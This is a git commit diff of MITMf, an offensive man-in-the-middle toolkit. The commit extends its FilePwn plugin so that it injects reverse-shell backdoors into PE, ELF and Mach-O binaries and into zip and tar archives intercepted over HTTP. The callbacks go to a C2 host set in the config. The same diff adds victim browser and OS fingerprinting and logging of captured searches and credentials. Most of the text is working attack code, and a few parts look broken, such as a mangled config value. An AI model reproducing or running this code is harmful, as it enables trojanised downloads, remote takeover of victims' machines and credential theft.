Mirror of https://github.com/byt3bl33d3r/MITMf.git (synced 2025-07-11 07:37:11 -07:00)
- Updated FilePwn plugin with BDFactory v0.2 + license
- Added partial OS and browser detection through clients' user-agents
- Improved jskeylogger plugin (now detects input field names)
- Fixed bug where jskeylogger sent invalid charCodes on Android devices
- Cleaned search-engine query parsing code in ServerConnection.py
- Updated setup.sh with new libs
parent a4e8869fc6
commit 4ae50e6e0c

8 changed files with 503 additions and 143 deletions
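The "OS and Browser detection" bullet is implemented in ServerConnection.py (see its hunks below) by running each request's User-Agent header through the user_agents package. As a rough, hedged sketch of what that library returns — the UA string, client IP and host below are invented for illustration — the new clientInfo log prefix is built like this:

# Hedged sketch (not part of MITMf): how the user_agents package turns a raw
# User-Agent header into the clientInfo prefix ServerConnection.py now logs.
# The UA string, client IP and host are invented for illustration.
from user_agents import parse

ua_string = "Mozilla/5.0 (Linux; Android 4.4.2; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36"
user_agent = parse(ua_string)

# Mirrors the format string added to sendRequest() in this commit.
clientInfo = "%s [type:%s-%s os:%s] " % ("192.168.1.50",
                                         user_agent.browser.family,      # e.g. 'Chrome Mobile'
                                         user_agent.browser.version[0],  # major version number
                                         user_agent.os.family)           # e.g. 'Android'
print clientInfo + "Sending Request: www.example.com"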
config/filepwn.cfg

@@ -1,3 +1,41 @@
+"""
+BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
+
+Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
+
+Copyright (c) 2013-2014, Joshua Pitts
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification,
+are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice,
+this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+this list of conditions and the following disclaimer in the documentation
+and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its contributors
+may be used to endorse or promote products derived from this software without
+specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGE.
+
+Tested on Kali-Linux.
+
+"""
+
 [ZIP]
 # patchCount is the max number of files to patch in a zip file
 # After the max is reached it will bypass the rest of the files

@@ -10,6 +48,18 @@ maxSize = 40000000
 
 blacklist = .dll, #don't do dlls in a zip file
 
+[TAR]
+# patchCount is the max number of files to patch in a tar file
+# After the max is reached it will bypass the rest of the files
+# and send on it's way
+
+patchCount = 5
+
+# In Bytes
+maxSize = 40000000
+
+blacklist = , # a comma is null do not leave blank
+
 [targets]
 #MAKE SURE that your settings for host and port DO NOT
 # overlap between different types of payloads

@@ -18,9 +68,11 @@ blacklist = .dll, #don't do dlls in a zip file
 
 LinuxType = ALL # choices: x86/x64/ALL/None
 WindowsType = ALL # choices: x86/x64/ALL/None
+FatPriority = x64 # choices: x86 or x64
 
-FileSizeMax = 50000000 # ~50 MB (just under) No patching of files this large
+FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
 
+CompressedFiles = True #True/False
 [[[LinuxIntelx86]]]
 SHELL = reverse_shell_tcp # This is the BDF syntax
 HOST = 192.168.1.168 # The C2

@@ -30,16 +82,16 @@ blacklist = .dll, #don't do dlls in a zip file
 
 [[[LinuxIntelx64]]]
 SHELL = reverse_shell_tcp
-HOST = 192.168.10.4
-PORT = 6666
+HOST = 192.168.1.16
+PORT = 9999
 SUPPLIED_SHELLCODE = None
 MSFPAYLOAD = linux/x64/shell_reverse_tcp
 
 [[[WindowsIntelx86]]]
-PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
-HOST = 192.168.10.4
-PORT = 6666
-SHELL = iat_reverse_tcp
+PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
+HOST = 192.168.1.16
+PORT = 8443
+SHELL = reverse_shell_tcp
 SUPPLIED_SHELLCODE = None
 ZERO_CERT = False
 PATCH_DLL = True

@@ -50,7 +102,21 @@ blacklist = .dll, #don't do dlls in a zip file
 HOST = 192.168.1.16
 PORT = 8088
 SHELL = reverse_shell_tcp
-SUPPLIED_SHELLCODE = None
+SUPPLIED_SHELLCODE = Nonepatchpatchpatch
 ZERO_CERT = True
 PATCH_DLL = False
 MSFPAYLOAD = windows/x64/shell_reverse_tcp
+
+[[[MachoIntelx86]]]
+SHELL = reverse_shell_tcp
+HOST = 192.168.1.16
+PORT = 4444
+SUPPLIED_SHELLCODE = None
+MSFPAYLOAD = linux/x64/shell_reverse_tcp
+
+[[[MachoIntelx64]]]
+SHELL = reverse_shell_tcp
+HOST = 192.168.1.16
+PORT = 5555
+SUPPLIED_SHELLCODE = None
+MSFPAYLOAD = linux/x64/shell_reverse_tcp
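The new [[[MachoIntelx86]]]/[[[MachoIntelx64]]] sections and the FatPriority key above are read by the FilePwn plugin through configobj (see the plugin hunks further down). A minimal hedged sketch of how those triple-bracketed subsections are reached — the print line is illustrative only:

# Hedged sketch of how the FilePwn plugin reads the nested config sections via
# configobj; the section path matches the plugin code below, the print is
# illustrative only.
from configobj import ConfigObj

userConfig = ConfigObj("./config/filepwn.cfg")

# [targets] -> [[ALL]] -> [[[MachoIntelx86]]] becomes three nested dict lookups.
macho_x86 = userConfig['targets']['ALL']['MachoIntelx86']
fat_priority = userConfig['targets']['ALL']['FatPriority']

# configobj returns plain strings, so ports are cast with int() where needed.
print "Mach-O x86 C2: %s:%s (FAT priority: %s)" % (macho_x86['HOST'], macho_x86['PORT'], fat_priority)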
libs/bdfactory (submodule)

@@ -1 +1 @@
-Subproject commit 89d87b2fa1a499998a2109a751d8869e52485e0c
+Subproject commit 303d059c4c2a1ecc19824bd755129152b6ad7fc1
ServerConnection.py

@@ -19,6 +19,7 @@
 import logging, re, string, random, zlib, gzip, StringIO, sys
 import plugins
 
+from user_agents import parse
 from twisted.web.http import HTTPClient
 from URLMonitor import URLMonitor
 from libs.sergioproxy.ProxyPlugins import ProxyPlugins

@@ -46,6 +47,7 @@ class ServerConnection(HTTPClient):
         self.postData = postData
         self.headers = headers
         self.client = client
+        self.clientInfo = None
         self.urlMonitor = URLMonitor.getInstance()
         self.hsts = URLMonitor.getInstance().isHstsBypass()
         self.plugins = ProxyPlugins.getInstance()

@@ -73,50 +75,25 @@ class ServerConnection(HTTPClient):
 
     def sendRequest(self):
         if self.command == 'GET':
-            message = "%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host'])
-            if self.urlMonitor.isClientLogging() is True:
-                self.urlMonitor.writeClientLog(self.client, self.headers, message)
-            else:
-                logging.info(message)
+            user_agent = parse(self.headers['user-agent'])
+            self.clientInfo = "%s [type:%s-%s os:%s] " % (self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
+            logging.info(self.clientInfo + "Sending Request: %s" % self.headers['host'])
 
             #Capture google searches
             if ('google' in self.headers['host']):
-                if ('search' in self.uri): #and ('search' in self.uri):
-                    try:
-                        for param in self.uri.split('&'):
-                            if param.split('=')[0] == 'q':
-                                query = str(param.split('=')[1])
-                                if query:
-                                    logging.info("%s is querying %s for: '%s'" % (self.client.getClientIP(), self.headers['host'], query))
-                    except Exception, e:
-                        error = str(e)
-                        logging.warning("%s Error parsing google search query %s" % (self.client.getClientIP(), error))
+                if ('search' in self.uri):
+                    self.captureQueries('q')
 
             #Capture bing searches
             if ('bing' in self.headers['host']):
                 if ('Suggestions' in self.uri):
-                    try:
-                        for param in self.uri.split('&'):
-                            if param.split('=')[0] == 'qry':
-                                query = str(param.split('=')[1])
-                                if query:
-                                    logging.info("%s is querying %s for: '%s'" % (self.client.getClientIP(), self.headers['host'], query))
-                    except Exception, e:
-                        error = str(e)
-                        logging.warning("%s Error parsing bing search query %s" % (self.client.getClientIP(), error))
+                    self.captureQueries('qry')
 
             #Capture yahoo searches
             if ('search.yahoo' in self.headers['host']):
                 if ('nresults' in self.uri):
-                    try:
-                        for param in self.uri.split('&'):
-                            if param.split('=')[0] == 'command':
-                                query = str(param.split('=')[1])
-                                if query:
-                                    logging.info("%s is querying %s for: '%s'" % (self.client.getClientIP(), self.headers['host'], query))
-                    except Exception, e:
-                        error = str(e)
-                        logging.warning("%s Error parsing yahoo search query %s" % (self.client.getClientIP(), error))
+                    self.captureQueries('command')
 
             #check for creds passed in GET requests.. It's surprising to see how many people still do this (please stahp)
             for user in self.http_userfields:

@@ -126,12 +103,22 @@ class ServerConnection(HTTPClient):
                     password = re.findall("(" + passw + ")=([^&|;]*)", self.uri, re.IGNORECASE)
 
                     if (username and password):
-                        message = "%s %s Possible Credentials (%s):\n%s" % (self.client.getClientIP(), self.command, self.headers['host'], self.uri)
-                        logging.warning(message)
+                        logging.warning(self.clientInfo + "%s Possible Credentials (%s):\n%s" % (self.command, self.headers['host'], self.uri))
 
         self.plugins.hook()
         self.sendCommand(self.command, self.uri)
 
+    def captureQueries(self, search_param):
+        try:
+            for param in self.uri.split('&'):
+                if param.split('=')[0] == search_param:
+                    query = str(param.split('=')[1])
+                    if query:
+                        logging.info(self.clientInfo + "is querying %s for: %s" % (self.headers['host'], query))
+        except Exception, e:
+            error = str(e)
+            logging.warning(self.clientInfo + "Error parsing google search query %s" % error)
+
     def sendHeaders(self):
         for header, value in self.headers.items():
             logging.debug("Sending header: (%s => %s)" % (header, value))

@@ -145,11 +132,7 @@ class ServerConnection(HTTPClient):
         elif 'keylog' in self.uri:
             self.plugins.hook()
         else:
-            message = "%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData)
-            if self.urlMonitor.isClientLogging() is True:
-                self.urlMonitor.writeClientLog(self.client, self.headers, message)
-            else:
-                logging.warning(message)
+            logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
             self.transport.write(self.postData)
 
     def connectionMade(self):
mitmf.py

@@ -9,6 +9,16 @@ from libs.sergioproxy.ProxyPlugins import ProxyPlugins
 import sys, logging, traceback, string, os
 import argparse
 
+try:
+    import user_agents
+except:
+    sys.exit("[-] user_agents library not installed!")
+
+try:
+    import configobj
+except:
+    sys.exit("[-] configobj library not installed!")
+
 from plugins import *
 plugin_classes = plugin.Plugin.__subclasses__()
 
FilePwn plugin

@@ -2,6 +2,44 @@
 # 99.9999999% of this code is stolen from BDFProxy - https://github.com/secretsquirrel/BDFProxy
 #################################################################################################
 
+"""
+BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
+
+Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
+
+Copyright (c) 2013-2014, Joshua Pitts
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification,
+are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice,
+this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+this list of conditions and the following disclaimer in the documentation
+and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its contributors
+may be used to endorse or promote products derived from this software without
+specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGE.
+
+Tested on Kali-Linux.
+
+"""
+
 import sys
 import os
 import pefile

@@ -10,12 +48,14 @@ import logging
 import shutil
 import random
 import string
-from libs.bdfactory import pebin, elfbin
+import tarfile
+from libs.bdfactory import pebin
+from libs.bdfactory import elfbin
+from libs.bdfactory import machobin
 from plugins.plugin import Plugin
 from tempfile import mkstemp
 from configobj import ConfigObj
 
 
 class FilePwn(Plugin):
     name = "FilePwn"
     optname = "filepwn"

@@ -23,6 +63,47 @@ class FilePwn(Plugin):
     has_opts = False
     desc = "Backdoor executables being sent over http using bdfactory"
 
+    def initialize(self, options):
+        '''Called if plugin is enabled, passed the options namespace'''
+        self.options = options
+
+        #FOR FUTURE USE
+        self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
+
+        #FOR FUTURE USE
+        self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
+
+        #USED NOW
+        self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
+                             'pe': {'number': 'MZ', 'offset': 0},
+                             'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
+                             'bz': {'number': 'BZ', 'offset': 0},
+                             'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
+                             'tar': {'number': 'ustar', 'offset': 257},
+                             'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
+                             'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
+                             'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
+                             }
+
+        #NOT USED NOW
+        #self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
+
+        self.userConfig = ConfigObj("./config/filepwn.cfg")
+        self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
+        self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
+        self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
+        self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
+        self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
+        self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
+        self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
+        self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86']
+        self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64']
+        self.FatPriority = self.userConfig['targets']['ALL']['FatPriority']
+        self.zipblacklist = self.userConfig['ZIP']['blacklist']
+        self.tarblacklist = self.userConfig['TAR']['blacklist']
+
+        print "[*] FilePwn plugin online"
+
     def convert_to_Bool(self, aString):
         if aString.lower() == 'true':
             return True

@@ -31,29 +112,11 @@ class FilePwn(Plugin):
         elif aString.lower() == 'none':
             return None
 
-    def initialize(self, options):
-        '''Called if plugin is enabled, passed the options namespace'''
-        self.options = options
-
-        self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
-                                'application/x-msdos-program', 'binary/octet-stream']
-
-        self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
-
-        #NOT USED NOW
-        #self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
-
-        self.userConfig = ConfigObj("./config/filepwn.cfg")
-        self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
-        self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
-        self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
-        self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
-        self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
-        self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
-        self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
-        self.zipblacklist = self.userConfig['ZIP']['blacklist']
-
-        print "[*] FilePwn plugin online"
+    def bytes_have_format(self, bytess, formatt):
+        number = self.magicNumbers[formatt]
+        if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
+            return True
+        return False
 
     def binaryGrinder(self, binaryFile):
         """

@@ -118,7 +181,7 @@ class FilePwn(Plugin):
                                          CAVE_JUMPING=cave_jumping,
                                          IMAGE_TYPE=self.WindowsType,
                                          PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
-                                         SUPPLIED_SHELLCODE=self.convert_to_Bool(self.WindowsIntelx86['SUPPLIED_SHELLCODE']),
+                                         SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
                                          ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
                                          )
 

@@ -126,17 +189,17 @@ class FilePwn(Plugin):
 
             elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
 
-                targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=True)
+                targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
                 targetFile.support_check()
 
                 if targetFile.class_type == 0x1:
-                    #x86
+                    #x86CPU Type
                     targetFile = elfbin.elfbin(FILE=binaryFile,
                                                OUTPUT=os.path.basename(binaryFile),
                                                SHELL=self.LinuxIntelx86['SHELL'],
                                                HOST=self.LinuxIntelx86['HOST'],
                                                PORT=int(self.LinuxIntelx86['PORT']),
-                                               SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx86['SUPPLIED_SHELLCODE']),
+                                               SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
                                                IMAGE_TYPE=self.LinuxType
                                                )
                     result = targetFile.run_this()

@@ -147,24 +210,200 @@ class FilePwn(Plugin):
                                                SHELL=self.LinuxIntelx64['SHELL'],
                                                HOST=self.LinuxIntelx64['HOST'],
                                                PORT=int(self.LinuxIntelx64['PORT']),
-                                               SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx64['SUPPLIED_SHELLCODE']),
+                                               SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
                                                IMAGE_TYPE=self.LinuxType
                                                )
                     result = targetFile.run_this()
 
+            elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
+                targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
+                targetFile.support_check()
+
+                #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
+
+                if targetFile.FAT_FILE is True:
+                    if self.FatPriority == 'x86':
+                        targetFile = machobin.machobin(FILE=binaryFile,
+                                                       OUTPUT = os.path.basename(binaryFile),
+                                                       SHELL=self.MachoIntelx86['SHELL'],
+                                                       HOST=self.MachoIntelx86['HOST'],
+                                                       PORT=int(self.MachoIntelx86['PORT']),
+                                                       SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
+                                                       FAT_PRIORITY=self.FatPriority
+                                                       )
+                        result = targetFile.run_this()
+
+                    elif self.FatPriority == 'x64':
+                        targetFile = machobin.machobin(FILE=binaryFile,
+                                                       OUTPUT = os.path.basename(binaryFile),
+                                                       SHELL=self.MachoIntelx64['SHELL'],
+                                                       HOST=self.MachoIntelx64['HOST'],
+                                                       PORT=int(self.MachoIntelx64['PORT']),
+                                                       SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
+                                                       FAT_PRIORITY=self.FatPriority
+                                                       )
+                        result = targetFile.run_this()
+
+                elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
+                    targetFile = machobin.machobin(FILE=binaryFile,
+                                                   OUTPUT = os.path.basename(binaryFile),
+                                                   SHELL=self.MachoIntelx86['SHELL'],
+                                                   HOST=self.MachoIntelx86['HOST'],
+                                                   PORT=int(self.MachoIntelx86['PORT']),
+                                                   SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
+                                                   FAT_PRIORITY=self.FatPriority
+                                                   )
+                    result = targetFile.run_this()
+
+                elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
+                    targetFile = machobin.machobin(FILE=binaryFile,
+                                                   OUTPUT = os.path.basename(binaryFile),
+                                                   SHELL=self.MachoIntelx64['SHELL'],
+                                                   HOST=self.MachoIntelx64['HOST'],
+                                                   PORT=int(self.MachoIntelx64['PORT']),
+                                                   SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
+                                                   FAT_PRIORITY=self.FatPriority
+                                                   )
+                    result = targetFile.run_this()
+
             return result
 
         except Exception as e:
+            print 'Exception', str(e)
             logging.warning("EXCEPTION IN binaryGrinder %s", str(e))
             return None
 
-    def zipGrinder(self, aZipFile):
+    def tar_files(self, aTarFileBytes, formatt):
+        "When called will unpack and edit a Tar File and return a tar file"
+
+        print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'
+
+        if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
+            print "[!] TarFile over allowed size"
+            logging.info("TarFIle maxSize met %s", len(aTarFileBytes))
+            return aTarFileBytes
+
+        with tempfile.NamedTemporaryFile() as tarFileStorage:
+            tarFileStorage.write(aTarFileBytes)
+            tarFileStorage.flush()
+
+            if not tarfile.is_tarfile(tarFileStorage.name):
+                print '[!] Not a tar file'
+                return aTarFileBytes
+
+            compressionMode = ':'
+            if formatt == 'gz':
+                compressionMode = ':gz'
+            if formatt == 'bz':
+                compressionMode = ':bz2'
+
+            tarFile = None
+            try:
+                tarFileStorage.seek(0)
+                tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
+            except tarfile.ReadError:
+                pass
+
+            if tarFile is None:
+                print '[!] Not a tar file'
+                return aTarFileBytes
+
+            print '[*] Tar file contents and info:'
+            print '[*] Compression:', formatt
+
+            members = tarFile.getmembers()
+            for info in members:
+                print "\t", info.name, info.mtime, info.size
+
+            newTarFileStorage = tempfile.NamedTemporaryFile()
+            newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)
+
+            patchCount = 0
+            wasPatched = False
+
+            for info in members:
+                print "[*] >>> Next file in tarfile:", info.name
+
+                if not info.isfile():
+                    print info.name, 'is not a file'
+                    newTarFile.addfile(info, tarFile.extractfile(info))
+                    continue
+
+                if info.size >= long(self.FileSizeMax):
+                    print info.name, 'is too big'
+                    newTarFile.addfile(info, tarFile.extractfile(info))
+                    continue
+
+                # Check against keywords
+                keywordCheck = False
+
+                if type(self.tarblacklist) is str:
+                    if self.tarblacklist.lower() in info.name.lower():
+                        keywordCheck = True
+
+                else:
+                    for keyword in self.tarblacklist:
+                        if keyword.lower() in info.name.lower():
+                            keywordCheck = True
+                            continue
+
+                if keywordCheck is True:
+                    print "[!] Tar blacklist enforced!"
+                    logging.info('Tar blacklist enforced on %s', info.name)
+                    continue
+
+                # Try to patch
+                extractedFile = tarFile.extractfile(info)
+
+                if patchCount >= int(self.userConfig['TAR']['patchCount']):
+                    newTarFile.addfile(info, extractedFile)
+                else:
+                    # create the file on disk temporarily for fileGrinder to run on it
+                    with tempfile.NamedTemporaryFile() as tmp:
+                        shutil.copyfileobj(extractedFile, tmp)
+                        tmp.flush()
+                        patchResult = self.binaryGrinder(tmp.name)
+                        if patchResult:
+                            patchCount += 1
+                            file2 = "backdoored/" + os.path.basename(tmp.name)
+                            print "[*] Patching complete, adding to tar file."
+                            info.size = os.stat(file2).st_size
+                            with open(file2, 'rb') as f:
+                                newTarFile.addfile(info, f)
+                            logging.info("%s in tar patched, adding to tarfile", info.name)
+                            os.remove(file2)
+                            wasPatched = True
+                        else:
+                            print "[!] Patching failed"
+                            with open(tmp.name, 'rb') as f:
+                                newTarFile.addfile(info, f)
+                            logging.info("%s patching failed. Keeping original file in tar.", info.name)
+
+                if patchCount == int(self.userConfig['TAR']['patchCount']):
+                    logging.info("Met Tar config patchCount limit.")
+
+            # finalize the writing of the tar file first
+            newTarFile.close()
+
+            # then read the new tar file into memory
+            newTarFileStorage.seek(0)
+            ret = newTarFileStorage.read()
+            newTarFileStorage.close()  # it's automatically deleted
+
+            if wasPatched is False:
+                # If nothing was changed return the original
+                print "[*] No files were patched forwarding original file"
+                return aTarFileBytes
+            else:
+                return ret
+
+    def zip_files(self, aZipFile):
         "When called will unpack and edit a Zip File and return a zip file"
 
-        logging.info("ZipFile size: %s KB" % (len(aZipFile) / 1024))
+        print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
 
         if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
-            logging.info("ZipFIle maxSize met %s" % len(aZipFile))
+            print "[!] ZipFile over allowed size"
+            logging.info("ZipFIle maxSize met %s", len(aZipFile))
             return aZipFile
 
         tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))

@@ -187,21 +426,24 @@ class FilePwn(Plugin):
             logging.info('Encrypted zipfile found. Not patching.')
             return aZipFile
 
-        logging.info("ZipFile contents and info:")
+        print "[*] ZipFile contents and info:"
 
         for info in zippyfile.infolist():
-            logging.info("\t%s %s %s" % (info.filename, info.date_time, info.file_size))
+            print "\t", info.filename, info.date_time, info.file_size
 
         zippyfile.extractall(tmpDir)
 
         patchCount = 0
 
+        wasPatched = False
+
         for info in zippyfile.infolist():
-            logging.info(">>> Next file in zipfile: %s" % info.filename)
+            print "[*] >>> Next file in zipfile:", info.filename
 
             if os.path.isdir(tmpDir + '/' + info.filename) is True:
-                logging.info('%s is a directory' % info.filename)
+                print info.filename, 'is a directory'
                 continue
 
             #Check against keywords
             keywordCheck = False
 

@@ -216,7 +458,8 @@ class FilePwn(Plugin):
                         continue
 
             if keywordCheck is True:
-                logging.info('Zip blacklist enforced on %s' % info.filename)
+                print "[!] Zip blacklist enforced!"
+                logging.info('Zip blacklist enforced on %s', info.filename)
                 continue
 
             patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)

@@ -224,12 +467,16 @@ class FilePwn(Plugin):
             if patchResult:
                 patchCount += 1
                 file2 = "backdoored/" + os.path.basename(info.filename)
+                print "[*] Patching complete, adding to zip file."
                 shutil.copyfile(file2, tmpDir + '/' + info.filename)
-                logging.info("%s in zip patched, adding to zipfile" % info.filename)
+                logging.info("%s in zip patched, adding to zipfile", info.filename)
+                os.remove(file2)
+                wasPatched = True
             else:
-                logging.info("%s patching failed. Keeping original file in zip." % info.filename)
+                print "[!] Patching failed"
+                logging.info("%s patching failed. Keeping original file in zip.", info.filename)
+
+            print '-' * 10
 
             if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
                 logging.info("Met Zip config patchCount limit.")

@@ -239,12 +486,12 @@ class FilePwn(Plugin):
 
         zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
 
-        logging.debug("Writing to zipfile: %s" % tmpFile)
+        print "[*] Writing to zipfile:", tmpFile
 
         for base, dirs, files in os.walk(tmpDir):
             for afile in files:
                 filename = os.path.join(base, afile)
-                logging.debug('[*] Writing filename to zipfile: %s' % filename.replace(tmpDir + '/', ''))
+                print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
                 zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
 
         zipResult.close()

@@ -252,36 +499,55 @@ class FilePwn(Plugin):
         shutil.rmtree(tmpDir)
 
         with open(tmpFile, 'rb') as f:
-            aZipFile = f.read()
+            tempZipFile = f.read()
             os.remove(tmpFile)
 
-        return aZipFile
+        if wasPatched is False:
+            print "[*] No files were patched forwarding original file"
+            return aZipFile
+        else:
+            return tempZipFile
 
     def handleResponse(self, request, data):
 
         content_header = request.client.headers['Content-Type']
+        client_ip = request.client.getClientIP()
 
         if content_header in self.zipMimeTypes:
-            logging.info("%s Detected supported zip file type!" % request.client.getClientIP())
-            bd_zip = self.zipGrinder(data)
-            if bd_zip:
-                logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
-                return {'request': request, 'data': bd_zip}
+            if self.bytes_have_format(data, 'zip'):
+                logging.info("%s Detected supported zip file type!" % client_ip)
+                bd_zip = self.zip_files(data)
+                if bd_zip:
+                    logging.info("%s Patching complete, forwarding to client" % client_ip)
+                    return {'request': request, 'data': bd_zip}
+
+            else:
+                for tartype in ['gz','bz','tar']:
+                    if self.bytes_have_format(data, tartype):
+                        logging.info("%s Detected supported tar file type!" % client_ip)
+                        bd_tar = self.tar_files(data)
+                        if bd_tar:
+                            logging.info("%s Patching complete, forwarding to client" % client_ip)
+                            return {'request': request, 'data': bd_tar}
+
 
         elif content_header in self.binaryMimeTypes:
-            logging.info("%s Detected supported binary type!" % request.client.getClientIP())
-            fd, tmpFile = mkstemp()
-            with open(tmpFile, 'w') as f:
-                f.write(data)
-
